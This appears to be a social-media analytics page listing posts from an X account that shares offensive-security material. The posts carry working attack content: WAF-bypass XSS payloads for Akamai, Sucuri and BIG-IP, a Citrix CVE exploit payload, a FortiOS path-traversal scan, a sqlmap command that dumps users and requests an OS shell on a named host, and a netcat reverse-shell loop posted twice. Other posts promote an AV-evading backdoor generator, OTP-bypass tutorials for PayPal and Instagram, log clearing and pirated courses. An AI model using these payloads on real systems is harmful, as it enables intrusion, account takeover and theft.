@TheMsterDoctor1 XX posts on X about bounty, $googl, journey, bug the most. They currently have [------] followers and [---] posts still getting attention that total [-----] engagements in the last [--] hours.
Social category influence: technology brands, stocks, social networks, finance, celebrities, countries, cryptocurrencies, premier league, champions league
Social topic influence: bounty #492, $googl, journey, bug, drop, if you, send, ip #877, the world, world of
Top accounts mentioned or mentioned by: @savetonotion @threadreaderapp @gmailcom @c0d3cr4zy @elvtnx @tsv @csv @hakluke @h4x0rfr34k @examplecom @t3l3machus @albinowax @naglinagli @elhackernet @zhero @themasterdoctor1 @gmailcom27223e3csvgonloadalertxss3e @gmailcomsvgonloadalertxss @calcsh @ba
Top assets mentioned: Alphabet Inc Class A (GOOGL), Story (IP), Cloudflare, Inc. (NET), Intercorp Financial Services Inc. (IFS)
Top posts by engagements in the last [--] hours
"While testing for CVE-2023-24488 I found various servers behind Akamai and since the original payload gives a Forbidden response I found this bypass: post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E"
X Link 2023-07-02T04:32Z 24.1K followers, [---] engagements
"ChatGPT was vulnerable to XSS via a Markdown link. I reported this at the end of March and haven't received any response from them yet but it was fixed some time later. This is the first time I found XSS in AI response. I believe this is not the last :) http://chat.openai.com"
X Link 2023-07-07T08:34Z 24.1K followers, [----] engagements
"Title :- A path traversal vulnerability in the FortiOS SSL VPN web portal CVE-2018-13379 httpx -l ips.txt -path "/remote/fgt_langlang=/././././/////////dev/cmdb/sslvpn_websession" -status-code -mc [---] #BugBounty #bugbountytip #bugbountytips #Hacking #CyberSecurity"
X Link 2023-07-07T08:38Z 22.3K followers, 31K engagements
"Prototype-Pollution XSS /blog/__proto__transport_url=%3C%2fscript%3E%3Cscript%3Ealert(document.cookie)%3C%2fscript%3Eivl0w -- Endpoint blog Not Vulnerable /my.basket/__proto__transport_url=%3C%2fscript%3E%3Cscript%3Ealert(document.cookie)%3C%2fscript%3Eivl0w -- Endpoint"
X Link 2023-07-31T06:50Z 22.3K followers, 19.6K engagements
"Top [--] GitHub dorks to find information disclosure vulnerabilities: [--]. filename:vim_settings.xml [--]. filename:secrets.yml [--]. filename:config.json [--]. filename:config.ini [--]. [--]. filename:config.xml #BugBounty #bugbountytip http://config.properties"
X Link 2023-07-29T07:05Z 25K followers, 10.2K engagements
"nmap -sS -sV -Pn -O -A -sC iptarget -sS: SYN Scan -sV: Version/Service Info -Pn: skip host discovery -O: OS scan -A: OS version Detection -sC: equivalent to --script=default #BugBounty #bugbountytip"
X Link 2023-07-30T17:25Z 22.3K followers, 20K engagements
"A WAF bypass details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain) Payload :- "Base Href=//X55.isx -- popedup xss Blocked: details/open=/Open/href=/data=+ontoggle="(alert)(document.domain) #bugbounty #hacking #cybersecurity #ethicalhacking #hacker"
X Link 2023-08-10T09:22Z 22.3K followers, 14.6K engagements
"Pentesting Cheat Sheet - Your Guide to Smarter & Faster Testing. I've come across an invaluable repository filled with snippets of codes and commands tailored to optimize our pentesting routines. #ocsp"
X Link 2023-08-19T20:38Z 22.3K followers, 10.6K engagements
"Sucuri bypass payload by @0xc4gr1 sCriptalert(document.cookie)/sCript;/ Bypass XSS BIG-IP WAF details/open=/Open/href=/data=+ontoggle="(alert)(document.domain) details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain) #BugBounty #BugBounty #"
X Link 2023-08-20T08:13Z 22.3K followers, [----] engagements
"Announced a new tool at @BSidesLeeds today: jsluice - for extracting URLs paths and secrets from JavaScript. It can do a couple of other cool things too - blog post and talk video coming soon :)"
X Link 2023-08-20T19:21Z 22.3K followers, [----] engagements
"Authorized camera access via Safari UXSS: the story of how a shared iCloud document can hack every website you've ever visited"
X Link 2023-08-22T05:19Z 22.3K followers, [----] engagements
"Easily Decompile APK's & Scan For Vulnerabilities - QuadraInspects framework integrates Andropass APKUtil and MobFS to automatically analyze APK files. - Repo: - Creator: @Morpheuslord2 - #infosec #bugbounty #bugbountytips #CTF #cybersecurity #apk"
X Link 2023-09-21T17:48Z 19.4K followers, [---] engagements
"All-in-One Scanning/Exploitation Tool - This tool scans for common vulnerabilities in different types of CMS platforms. - - Repo: Creator:@DionachCyber - - #infosec #CTF #bugbountytips #cybersecurityCMSMap"
X Link 2023-09-22T16:34Z 22.3K followers, 30.1K engagements
"SQLi Authentication Bypass - Master List (2022) - I've gathered a ton of payloads from various sources load these into your favorite fuzzing tool - Link: - - #cybersecuritytips #infosec #CTF #bugbountytips https://pastebin.com/rKpsMp0g"
X Link 2023-09-23T18:22Z 25K followers, 39.6K engagements
"Carnage - File Upload (Extension Bypass) - Using various techniques this tool will try to bypass file upload restrictions. See video below for more information. - Repo: - Video: - - #cybersecurity #bugbountytips #CTF #infosecurity"
X Link 2023-09-23T18:56Z 22.3K followers, [---] engagements
"LinWinPwn - Active Directory Vulnerability Scanner - Scan with the help of impacket bloodhound crackmapexec ldapdomaindump lsassy smbmap kerbrute adidnsdump and more. - Repo: - - #CyberSecurity #infosec #CTF #windows #AD #bugbountytips"
X Link 2023-09-23T18:59Z 19.4K followers, 41.8K engagements
"autoSSRF (Automatic SSRF Testing) - Smart fuzzing on relevant SSRF GET parameters and Context-based dynamic payload generation - Repo: - Creator: @Th0h0 - - #CyberSecurity #bugbountytips #infosec #CTF #tools"
X Link 2023-09-23T19:01Z 22.3K followers, 22K engagements
"Villain - (Undetectable Backdoor Generator) - Villain has a built-in auto-obfuscate payload function to assist in bypassing AV. Payloads are currently undetected - Repo: - Creator: @t3l3machus - - #CyberSecurity #infosec #CTF #windows #bugbountytips"
X Link 2023-09-24T17:18Z 16.6K followers, 23.7K engagements
"Log files to check for valuable information & clear system logs. - Here is a small list of UNIX locations to modify/view while you're on a machine. - #CyberSecurity #infosec #CTF #bugbounty"
X Link 2023-09-24T22:27Z 22.3K followers, [----] engagements
"AORT - Automated Recon (easy to use) - Checks for subdomains ports whois emails waybackmachine DNS and more - Repo: - Creator: @D3Ext - #cybersecuritytips #infosec #bugbountytips #CTF #recon #CTF #infosec #cybersecuritytips #cybersecurity #bugbounty"
X Link 2023-09-25T07:33Z 22.3K followers, 21.8K engagements
"Toxssin - (Incredible XSS Hook) - This is the best I've seen in quite a long time check out the video linked below for a demonstration. - Repo: - Video: - Creator: @t3l3machus - - #cybersecurity #bugbountytips #CTF #infosec"
X Link 2023-09-25T07:38Z 22.3K followers, 10.2K engagements
"SSRFire - Automated SSRF Finder - Tool to automate SSRF discovery with extra features to find XSS / Open Redirects. - Repo: - #infosec #CyberSecurity #CTF #BugBounty"
X Link 2023-09-25T07:51Z 22.3K followers, [----] engagements
""How can I improve this " any solution"
X Link 2023-09-25T20:26Z 22.3K followers, 42.1K engagements
"@007_isnuoT @albinowax @hakluke @naglinagli thank you redis is closes"
X Link 2023-09-25T22:19Z 22.3K followers, [---] engagements
"Reverse Shell Bash Loop: - while true; do sleep [--] && mknod /dev/shm/p p; cat /dev/shm/p /bin/bash -i nc 127.0.0.1 [----] /dev/shm/p; done - #CyberSecurity #CTF #bugbountytips"
X Link 2023-09-27T08:06Z 22.3K followers, 13K engagements
"@Rhynorater @albinowax @hakluke @naglinagli Hey @Rhynorater I found the flag any other way to get reverse shell"
X Link 2023-09-29T02:05Z 28.1K followers, [---] engagements
"Recon Tool: Mantra Mantra by MrEmpy is a tool with the primary objective of searching for API keys in JavaScript files and HTML pages. It works by checking the source code of web pages and script files for strings that are identical or similar to API keys. #recon #API"
X Link 2023-10-02T01:46Z 13.9K followers, 15.2K engagements
"ChopChop - Quickly Discover Sensitive Endpoints/Files/Folders - Repo: - Creator: @michelin_eng - #cybersecuritytips #CybersecurityNews #bugbountytips #ctf #infosec"
X Link 2023-10-02T09:10Z 22.3K followers, 16.8K engagements
"SSRF / LFI / Remote Code Execution CSZCMS version 1.3.0 server-side request forgery exploit that leverages local file inclusion to inject a remote shell. #BugBounty #InfoSec #CyberSecurity #HackerOne #BugHunting #WebSecurity #PenTest #AppSec #CyberAttack @elvtnx"
X Link 2023-10-04T01:03Z 25.1K followers, 14.8K engagements
"SQL injection vulnerability that can be used to escalate privileges and execute code. #Exploit sqlmap -u --hex --time-sec=17 --dbms=mysql --technique=u --random-agent --eta -p account_type_number -D mims -T users --dump --os-shell @elvtnx http://0day.gov/mims/updateacc"
X Link 2023-10-05T02:47Z 28.1K followers, 16.2K engagements
"Free [--] Methods For Cloud Attacks(RTC0009) Original Post: #hacking #redteam #cybersecurity #cloud #cloudattacks #cloudsecurity #cloudpentest #aws #gcp #azure"
X Link 2023-10-07T03:31Z 22.3K followers, 19.7K engagements
"Who wants a slice of cyber knowledge with a side of humor? Join us on this journey to explore the fascinating world of cybersecurity. Follow for tech insights memes and the occasional cyber adventure. Like and comment 'Yes' if you want to see this content. Cross-site Scripting XSS Cheat Sheet #Cybersecurity #TechHumor #CyberAdventures #GeekLife #bugbountytips"
X Link 2023-10-09T02:24Z 19.4K followers, 42.9K engagements
"Discover a comprehensive 71-page guide to Red Team Security Certification Preparation and more in the realm of #cybersecurity. Elevate your knowledge and skills in #pentesting #informationsecurity and unlock coveted #certifications. Dive into the world of ethical #hacking. Source: If you found this information valuable please give it a LIKE and share your thoughts in the comments below Your engagement and feedback fuel my commitment to bringing you the best cybersecurity insights. Let's continue this journey together #redteam #cybersecurity #pentest"
X Link 2023-10-09T06:32Z 22.3K followers, 59.1K engagements
"Bug Bounty Cheat Sheet. Hey #Infosec folks Here's a comprehensive Bug Bounty Cheat Sheet to supercharge your security assessments. Cheers to my amazing followers. If you find this content helpful please like and comment 'Yes.' Recon Workflow Horizontal & Vertical Correlations amass intel -org company name here amass intel -asn ASN Number Here amass intel -cidr CIDR Range Here amass intel -whois -d Domain Name Here amass enum -passive -d Domain Name Here Useful Lists and Resources SecLists by Daniel Miessler Subdomain Bruteforcing - CT_subdomains Subdomain"
X Link 2023-10-09T08:29Z [----] followers, 11.6K engagements
"Unlocking the Power of Google Dorks: Discover hidden online treasures with these expert tips and tricks. Learn how to search the web like a pro. If you like my content please give it a thumbs up and comment "Yes" for more valuable insights. Thank you followers #LikeAndComment #ThankYouFollowers #GoogleDork #WebSearch #OnlineSearching #InformationDiscovery #CyberSecurity #SearchTechniques #DigitalInvestigation #DataMining #TechTips #InternetResearch #GoogleDorks #SearchSkills #WebSecurity"
X Link 2023-10-09T17:49Z 22.3K followers, [----] engagements
"Probably the best thing you'll see today. Free Offensive Security Notes PDF Courses + Video on OSCP OSWE OSEP OSED OSDA OSWA OSWE OSWP EXP301 EXP312 WEB300 CEH CEH v3 CEH v12 CCC CKLP Cisco CCNA 200-125 and more. Get your hands on these resources: Offensive Security-EXP301-Windows.User.Mode.Exploit.Development/ Offensive Security-EXP312-Advanced macOS Control Bypasses OSMR Certification/ Offensive Security-EXP312-Advanced macOS Control Bypasses OSMR Certification/ Offensive Security-WEB300-Advanced.Web.Attacks.&.Exploitation/ Offensive"
X Link 2023-10-13T08:18Z 22.3K followers, 18.1K engagements
"Just to clarify I don't own any of the content you find on Google. If someone has an issue with my posts they should reach out to the content's original owner and request removal. However please understand that I am not responsible for what you find on Google. Thank you for your understanding. Probably the best thing you'll see today. Free Offensive Security Notes PDF Courses + Video on OSCP OSWE OSEP OSED OSDA OSWA OSWE OSWP EXP301 EXP312 WEB300 CEH CEH v3 CEH v12 CCC CKLP Cisco CCNA 200-125 and more. Get your hands on these resources: Offensive"
X Link 2023-10-14T02:11Z 22.3K followers, [--] engagements
"Probably the best thing you'll see today. Free Offensive Security Notes PDF Courses + Video on OSCP OSWE OSEP OSED OSDA OSWA que OSWE OSWP EXP301 EXP312 WEB300 CEH CEH v3 CEH v12 CCC CKLP Cisco CCNA 200-125 and more. "Just to make things clear for my followers I want to emphasize that I don't have ownership over any content found on Google If anyone has concerns about my posts they should contact the original content creators to request removal. Please remember that I cannot control what you come across on Google. Your understanding is greatly"
X Link 2023-10-14T06:52Z 19.4K followers, 49K engagements
"Exploring Cross-Site Scripting (XSS): img onload="eval(atob('2G9jdW1lbnQubG9jYXRpb249ImhodHA6Ly9saXNOZXJuSVAvlitkb2 NIbWVudC5jb29raWU=)" Objectives: This represents Base [--] encoding exploitation. A HREF="http://6 6.000146.0x7.147/"XSS/A Objective: This represents the Mixed encoding exploitation vector. A HREF="//google"XSS/A Objective: This represents the protocol resolution bypass vector part [--]. A HREF="http://ha.ckers. org@google"XSS/A Objective: This represents the protocol resolution bypass vector part [--]. A Objective: This represents the protocol resolution bypass vector part [--]. A"
X Link 2023-10-20T06:51Z [----] followers, [----] engagements
"OSCP Cheat Sheet. Since this little project gets more and more attention @syr0_ decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam Repo: This repository will also try to cover as much as possible of the tools required for the proving grounds boxes. #OSCP #InfoSec #PenTest #CyberSecurity #HackTheBox #EthicalHacking #Pentesting #RedTeam #TryHarder #CertificationGoals"
X Link 2023-10-21T01:59Z [----] followers, 17.2K engagements
"Free Offensive Security Notes (OSCP OSWE OSEP OSED OSWA OSMR OSDA). I want to express my heartfelt gratitude for having the most incredible mentor @C0d3Cr4zy. Your dedication and expertise in creating outstanding content have made it accessible for everyone to learn Thank you Credit:@C0d3Cr4zy OSCP NOTES ACTIVE DIRECTORY: OSCP Notes : OSWE Notes: OSWA Offensive Security Web Attacks: OSDA Offensive Security Defense Analyst OSMR Offensive Security MAC Control Bypass All my followers Remember to keep trying harder and never stop learning Oh I'd like to thank my haters for"
X Link 2023-10-22T18:42Z 22.3K followers, [----] engagements
"OSCP-Survival-Guide. Kali Linux Offensive Security Certified Professional . NOTE: This document refers to the target ip as the export variable $ip. Penetration Testing Study Notes This repo contains all my penetration testing study notes penetration testing tools scripts techniques tricks and also many scripts that I found them useful from all over the internet. Credit: @WWong99 Repo: #oscp #hacking #ceh #cybersecurity #hacker #ethicalhacking #kalilinux #infosec #pentesting #hackers #cissp #ethicalhacker #linux #cybersecuritytraining #sqlinjection #cybersecurityawareness #bugbounty"
X Link 2023-10-24T01:45Z 22.5K followers, 31.6K engagements
"Unlock the power of cybersecurity with this comprehensive OSCP Guide. Whether you're a seasoned pro or just starting out this repository by MAX-P0W3R has everything you need to supercharge your OSCP journey. From cheat sheets to walkthroughs it's your one-stop destination for success. Don't miss out on this invaluable resource. Check it out now Repo: #OSCP #Cybersecurity #InfoSec #oscp #hacking #ceh #cybersecurity #hacker #ethicalhacking #kalilinux #infosec #pentesting #hackers #cissp #ethicalhacker #linux #cybersecuritytraining #sqlinjection #cybersecurityawareness #bugbounty"
X Link 2023-10-24T04:31Z [----] followers, [----] engagements
"Amazing Google Dorks for Bug Bounty Input your target to generate Google Dork links for easy OSINT recon #bugbountytips Credit: @TakSec"
X Link 2023-10-27T03:36Z [----] followers, 19.1K engagements
"Hey there amazing Twitter community. I'm excited to connect with all of you. Let's build a network of like-minded individuals. Exciting Opportunity Unlock the secret [---] PDF Course and Notes. Perfect for those aspiring to conquer Offensive Security Notes (OSCP OSWE OSEP OSED) Get it Now for FREE The first 1000 people comment 'YES.' I will send the link privately for every single one who comments 'yes.' And wait [--] minute and you will receive the link in your inbox. Follow like and comment if you'd like to be a part of this journey. Feel free to send me a DM and"
X Link 2023-11-02T04:02Z [----] followers, 37.4K engagements
"Are you aspiring to conquer the challenging OSCP exam and level up your cybersecurity skills? Look no further I'm excited to share with you an incredible resource a meticulously curated list of awesome OSCP resources hosted on GitHub. Whether you're just starting your OSCP journey or are a seasoned infosec professional this treasure trove has something for everyone. Inside you'll discover a wealth of knowledge including: In-depth OSCP reviews and guides to help you understand the exam's intricacies. Cheatsheets and scripts to streamline your penetration testing. Topics covering"
X Link 2023-11-04T06:50Z [----] followers, 15.5K engagements
"Excited to share the RedTeam Blueprint - A Unique Guide to Ethical Hacking [--] Penetration Testing Process - [--] files [--] The Windows Operating System - [--] files [--] The Linux Operating System - [--] files [--] Operating System Internals - [--] files [--] Active Directory - [--] files [--] Kerberos - [--] files [--] Data Manipulation - [--] files [--] Networking - [--] files [--] VPNs - [--] files [--] Firewalls - [--] files [--] Configuring PFSense Firewalls - [--] files [--] Program Theory - [--] files [--] Python Course - [--] files [--] Assembly Course - [--] files [--] Scope Identification - [--] files [--] Reconnaissance -"
X Link 2023-11-08T05:24Z 11.2K followers, 23.2K engagements
"Exciting news Check out this incredible collection of premium courses curated by server_z for your educational journey: [--] ITIL [--] Windows [--] Courses [--] PowerShell [--] Outlook [---] [--] Linux [--] Customer Services [--] Group Policy [--] MCSA [----] [--] MCSA [----] Outlook [----] [--] SCCM [--] Azure: AZ900 AZ104 AZ500 [--] Azure: AZ304 [--] Azure: AZ303 [--] User Experience Design [--] Citrix [--] MCSA - CBT Nuggets [--] CCSP [--] Cisco Certified CyberOps Unlock the knowledge with the provided links and password: _. Dive into these courses for educational purposes and elevate your skills #LearningOpportunities"
X Link 2023-11-09T05:04Z 11.5K followers, 38.3K engagements
"Explore a treasure trove of cybersecurity knowledge. FREE Cybersecurity Book is now accessible via Google Drive: Enhance your online safety with valuable insights. Grab your copy now #CybersecurityBooks #FreeDownload #OnlineSafety Books"
X Link 2023-11-10T10:24Z 12.4K followers, 34.8K engagements
"Attention Cyber Enthusiasts. Check out this curated collection of [---] FREE PDFs to elevate your Cyber Security expertise. Explore the Drive now and boost your knowledge in the realm of #cybersecurity #hacking and #infosecurity. Drive Link: Note: Heads up I'm not the owner of this content; use it responsibly. If you have questions or want to discuss further feel free to message me directly. I'm here to answer everyone. Let's engage in a cyber-savvy conversation. Happy learning https://drive.google.com/drive/mobile/folders/179D_slEOLXWOTeFdmRrMkdV8C4DSLdYT"
X Link 2023-11-15T03:31Z 28.4K followers, 23.2K engagements
"If you want to learn CYBERSECURITY for FREE this THREAD is for you. Here are Loads of FREE RESOURCES (Courses Certifications Communities Internship opportunities) to get you STARTED. [--]. Cisco CCNA Cyber Ops Associate 200-201 - MEGA [--]. Cybersecurity FULLY LOADED by Simplilearn [--]. Cybersecurity FULL course by EDUREKA [--]. Awesome Cybersecurity University [--]. Cybersecurity books for beginners [--]. Cybersecurity Documents There's still more in the thread. Kindly Repost and TAG your friends/families that may need this"
X Link 2023-11-15T21:19Z 15K followers, 248.4K engagements
"Embark on a comprehensive journey to mastery with the Cisco CCNA 200-301 Exam Complete Course. Unlock [---] immersive labs for hands-on learning ensuring a solid foundation in networking. Link: Elevate your skills and conquer the CCNA certification. #CCNA #Networking #CiscoCertified https://mega.nz/folder/Bro0kIpY#5bxE_48py3JRf8NmSYsINA"
X Link 2023-11-22T07:59Z 24.1K followers, 16.8K engagements
"@jonathandata1 @Apple"
X Link 2023-11-22T09:03Z 12.3K followers, [--] engagements
"Exciting news. I'm sharing [---] PDF files packed with valuable content for FREE 100% Free Don't Miss. Simply: [--]. Follow (So I Will Dm) [--]. Like and Repost [--]. Comment Send to receive your copies. Let's learn together #FreeLearning #KnowledgeSharing"
X Link 2023-11-25T06:27Z 24.2K followers, 37.2K engagements
"Today's shoutout to bug bounty hunters and penetration testers. Here are [--] websites that can level up your game: Links: Happy hunting #BugBounty #PenTest #Cybersecurity https://azuremarketplace.microsoft.com/en-us/marketplace/apps/kali-linux.kali https://vulners.com/ https://grep.app/ https://app.netlas.io/ https://fullhunt.io/ https://x.com/TheMsterDoctor1/status/1728659508107362323/photo/1"
X Link 2023-11-26T06:18Z 25.1K followers, 45.2K engagements
"Screenshot working code. This tool lets you upload a screenshot of any website and convert it into HTML / Tailwind CSS. The link to access this tool:"
X Link 2023-11-27T05:23Z 15.6K followers, [----] engagements
"Excited to embark on the CEH v11 journey. Ready to dive into the world of ethical hacking and enhance my cybersecurity skills. #CEHv11 #EthicalHacking #Cybersecurity 100% Free For First [----] Users. Simply: [--]. Follow (So I Will Dm) [--]. Like and Repost [--]. Comment Send to receive your copies"
X Link 2023-11-27T05:30Z 13.2K followers, [---] engagements
"New [---] TB Tutorials + Books + Courses + Trainings + Workshops + Educational Resources. Data science Python Data Analytics AWS Certified BIG DATA BI Machine Learning and more. Simply: [--]. Follow (So I Will Dm) [--]. Like and Repost [--]. Comment "Send" #python #DataScience"
X Link 2023-11-27T05:47Z 14.3K followers, [----] engagements
"Latest CVE Mass-Bruter - Mass Bruteforce Network Protocols"
X Link 2023-11-27T23:33Z 14.4K followers, [----] engagements
"CVE-2023-36745: Microsoft Exchange Server RCE PoC:"
X Link 2023-11-27T23:33Z 13.6K followers, [--] engagements
"Visual Studio Code Security: Finding New Vulnerabilities in the NPM Integration (3/3)"
X Link 2023-11-27T23:34Z 13.9K followers, [--] engagements
"CVE-2023-22516: Critical RCE Vulnerability Discovered in Atlassian Bamboo"
X Link 2023-11-27T23:35Z 14K followers, [--] engagements
"CVE-2023-37924: Apache Submarine SQL Injection Vulnerability"
X Link 2023-11-27T23:35Z 13.6K followers, [--] engagements
"Proof of Concept for CVE-2023-38646 This vulnerability has been declared as critical because it allows an unauthenticated attacker to execute arbitrary commands with the same privileges as the Metabase server. This vulnerability means the Metabase server can become a potential entry point for malicious attacks which could compromise the integrity of the whole system it operates on"
X Link 2023-11-27T23:35Z 13.9K followers, [--] engagements
"CVE-2023-36874: Windows LPE"
X Link 2023-11-27T23:35Z 13.6K followers, [--] engagements
"CVE-2023-29360 #Exploit for CVE-2023-29360 targeting MSKSSRV.SYS driver"
X Link 2023-11-27T23:36Z 13.9K followers, [--] engagements
"CVE-2023-22515: Confluence Broken Access Control https://github.com/Chocapikk/CVE-2023-22515"
X Link 2023-11-27T23:36Z 25K followers, [--] engagements
"Researchers Published PoC Exploit for Windows Zero-Day CVE-2023-36025 Vulnerability"
X Link 2023-11-27T23:36Z 13.9K followers, [--] engagements
"Researchers Published PoC Exploit for Windows Zero-Day CVE-2023-36025 Vulnerability"
X Link 2023-11-27T23:36Z 14K followers, [--] engagements
"CVE-2023-2598 LPE PoC of a vulnerability in the io_uring subsystem of the Linux Kernel. #cve #cybersecurity #infosec"
X Link 2023-11-27T23:37Z 14K followers, [---] engagements
"CVE-2023-46302: Critical Apache Submarine RCE Vulnerability"
X Link 2023-11-27T23:37Z 13.5K followers, [---] engagements
"Splunk RCE Vulnerability Let Attackers Upload Malicious File"
X Link 2023-11-27T23:37Z 14.6K followers, [---] engagements
"Here's a small #XSS list for manual testing (main cases high success rate). "img src onerror=alert(1) "autofocus onfocus=alert(1)// /scriptscriptalert(1)/script '-alert(1)-' '-alert(1)// javascript:alert(1) Try it on: - URL query fragment & path; - all input fields. A nice way to store the payload "scripteval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))/script A payload to bypass Akamai WAF A href="javascrip%09t:eval.apply$jj.className+(23)" id=jj class=alertClick Here Another one "img/src/style=html:url("data:"svg/onload=confirm(69)") BlindXSS-Payloads: #Max"
X Link 2023-12-05T10:24Z 16.9K followers, [----] engagements
"@eagle_0408"
X Link 2023-12-07T12:17Z 15K followers, [--] engagements
"Probably the best thing you'll see today. Free Offensive Security Notes PDF Courses + Video on OSCP OSWE OSEP OSED OSDA OSWA OSWE OSWP EXP301 EXP312 WEB300 CEH CEH v3 CEH v12 CCC CKLP Cisco CCNA 200-125 and more. Found Interesting Information. I came across some fascinating information on the web through Google and I wanted to share it with all of you. Please note that this content is not mine and I do not own it. All credit goes to the original source. If you have any questions or concerns please communicate with the content owner directly. Let's enjoy learning and exploring"
X Link 2023-12-08T11:42Z [----] followers, 14.8K engagements
"8000+ XSS Payloads GitHub : github : #bugbounty #Infosec #xss Share & Support Us https://github.com/radhasec/xss_payload https://github.com/payloadbox/xss-payload-list"
X Link 2023-12-09T12:20Z 25.1K followers, 23.5K engagements
"List of the most secure privacy email providers. Most of these companies will not co-operate with Law Enforcement and the content is encrypted. Share & Support Us"
X Link 2023-12-09T12:21Z 16.6K followers, 10.5K engagements
"Unlocking the potential of AI & ChatGPT for making money online. Dive into my dual guides for a roadmap to online income and steady revenue streams. 100% Free For First [----] Users. Simply: [--]. Follow (So I Will Dm) [--]. Like and Repost [--]. Comment Send to receive your link "I do not own this content. For any issues or concerns please contact the rightful owner directly." #AI #ChatGPT #OnlineIncome #SideHustle""
X Link 2023-12-10T07:34Z 15.5K followers, [----] engagements
"Linux+ notes You can share these if you want but you can't sell/use them as part of any paid training. Built by my VA. I won't share her name because then some of you will try hacking her. plus I don't want anyone to hire her away because it's tough to find high performers. last link only works outside of Twitter. Copy paste outside of Twitter"
X Link 2023-12-12T00:16Z 18.8K followers, 21.5K engagements
"HOW TO BYPASS OTP VERIFICATION Bypass OTP verifications from Paypal Instagram and many others using a Discord Bot and telegram Bot or the private API Tutorials -"
X Link 2023-12-12T02:32Z 18.5K followers, 23.6K engagements
"Mr. Robot Walkthrough. Full walkthrough exploiting the machine. Getting all the keys. Tools Used - Netdiscover Nmap Netcat Python GTFObins Hacking wordpress Hydra Mega Download Link - JOIN FOR MORE @TheMsterDoctor1"
X Link 2023-12-12T02:33Z 16.9K followers, [----] engagements
"100% Free For First [----] Users. Simply: [--]. Follow (So I Will Dm) [--]. Like and Repost [--]. Comment Send to receive your copies "I do not own this content. For any issues or concerns please contact the rightful owner directly.""
X Link 2023-12-12T05:06Z 15.6K followers, [----] engagements
"Reverse Shell Bash Loop: while true; do sleep [--] && mknod /dev/shm/p p; cat /dev/shm/p /bin/bash -i nc 127.0.0.1 [----] /dev/shm/p; done"
X Link 2023-12-12T10:06Z 28.1K followers, [----] engagements
"COMPLETE DARK WEB COURSE: Introduction to Deep Web. Setting up the environment. Hands on with the Deep web. Deep web link Directories. Bit coin and Crypto-currency on the Dark web. PGP tutorial. How to create and host Deep web. How to access the Deep web on Android. Link - SHARE AND SUPPORT"
X Link 2023-12-13T03:17Z 19.4K followers, 37.5K engagements
"An Akamai WAF bypass payload 1'"A HRef=" AutoFocus OnFocus=top/**/.'ale'%2B'rt'(1) #WAF #Bypass"
X Link 2023-12-13T03:26Z 15.9K followers, [---] engagements
"IP-search engines (Netlas Shodan Fofa) can be used to find links to various interesting content on sites that are not indexed by Google. Example of a query for Netlas: http.body:osint.pdf replace osint to other keyword and pdf to any other file ext github : Share & Support Us"
X Link 2023-12-13T22:23Z 18.9K followers, 15.5K engagements
"Nuclei Templates AI Generator Nuclei Template Editor - AI-powered hub to create debug scan and store templates. Covering a wide array of vulnerabilities using public templates & rich CVE data. Note: Current focus is HTTP more protocols coming soon Source: #nuclei #template #generator Share & Support Us"
X Link 2023-12-13T22:25Z 19.4K followers, [----] engagements
"Cyber Security Docs Happy learning #cybersecurity #learning"
X Link 2023-12-14T07:16Z 19.4K followers, 37.8K engagements
"Getting information through the mail. Here's what we can get: - Owner's name - Date of last edit - Google id - Possible YouTube channel - Possible names - Public photos - Phone models - Firmware phones - Possible physical location Installation: $ apt update $ apt upgrade $ apt install git python $ git clone $ pip3 install -r requirements.txt $ python check_and_gen.py $ python example@gmail.com"
X Link 2023-12-16T13:01Z 19.4K followers, 13.8K engagements
"USEFUL WEBSITES FOR PENTESTERS & HACKERS: Exploits Database, Vulnerabilities Database, Hacking Tutorials, Virus Scan --Not distribute to AV--, Tools Download"
X Link 2023-12-18T08:19Z 19.4K followers, 24K engagements
"UserFinder - OSINT tool for finding profiles by username. Discover profiles across the web with this powerful Open Source Intelligence (OSINT) tool designed specifically for username searches. Installation: apt update apt upgrade apt install git git clone How to Use: cd UserFinder bash Now type Username you want to find on different Now you will see which username is on which platform and which is not"
X Link 2023-12-19T07:55Z 19.4K followers, 24.7K engagements
"GDorks - Google Dork List - Uncover the Hidden Gems of the Internet ( There are at least 320+ categories ) Github #dork - Dorks(1M)/ - - Split #1.txt - Split #2.txt - Split #3.txt - . - More-Dorks/ - - 7k.txt - best2.txt - Amazon10k.txt - Gaming.txt - Shoping.txt - . - SQLi/ - - Sqli.txt - Sqli2.txt - . - XSS/ - - XSS.txt - . - LFI/ - - LFI.txt - . - WordPress/ - - 17k.txt - wp(30K).txt - . - Joomla/ - - Joomla.txt - Joomla2.txt - . - Laravel/ - - 1.txt - . - CCTV/ - - cctv.txt - . - Netflix/ - 48.txt - . - dorks.txtdorks.jsondorks2.txtdorks3.txtdorks-2023.txtdork"
X Link 2023-12-19T09:49Z 19.4K followers, 16.9K engagements
"100% Free For First [----] Users. Simply: [--]. Follow (So I Will Dm) [--]. Like and Repost [--]. Comment Send to receive your link "I do not own this content. For any issues or concerns please contact the rightful owner directly." Share this post to spread the word #Infosec #Cybersecurity #EthicalHacking #FollowMe #Cybersecurity #Infosec #infosec #Hacking #infosecurity #Malware #bugbountytips #CTF #BugBounty #vulnerability #pwn #CyberSecurityAwareness #CyberSecurity #cybersecuritytips @SaveToNotion @threadreaderapp #oscp #osed #oswe #osep #osce #pentest #hacking #infosecnotes #cybersecurity"
X Link 2023-12-20T04:58Z 19.4K followers, 41.3K engagements
"PoC for CVE-2023-50164 - Proof of Concept for Path Traversal in Apache Struts Github: #POC #CVE https://github.com/dwisiswant0/cve-2023-50164-poc"
X Link 2023-12-21T09:56Z 24K followers, [----] engagements
"ofbiz-CVE-2023-49070-RCE-POC This is a pre-auth RCE POC For CVE-2023-49070 which affected Apache ofbiz applications 18.12.10 due to xml-rpc java deserialization bug. Repo: https://github.com/abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC"
X Link 2023-12-21T10:10Z 24K followers, [----] engagements
"Linux Privilege Escalation Cheatsheet So you got a shell, what now? This cheatsheet will help you with local enumeration as well as escalate your privilege further. Usage of different enumeration scripts is encouraged; my favourite is LinPEAS. Another linux enumeration script I personally use is LinEnum. Abuse existing functionality of programs using GTFOBins. Note: This is a live document. I'll be adding more content as I learn more. Unstable shell Send yourself another shell from within the unstable shell which nc nc $ip $port Make it functional Necessary for privilege escalation purposes which"
X Link 2023-12-21T18:18Z 28.1K followers, [----] engagements
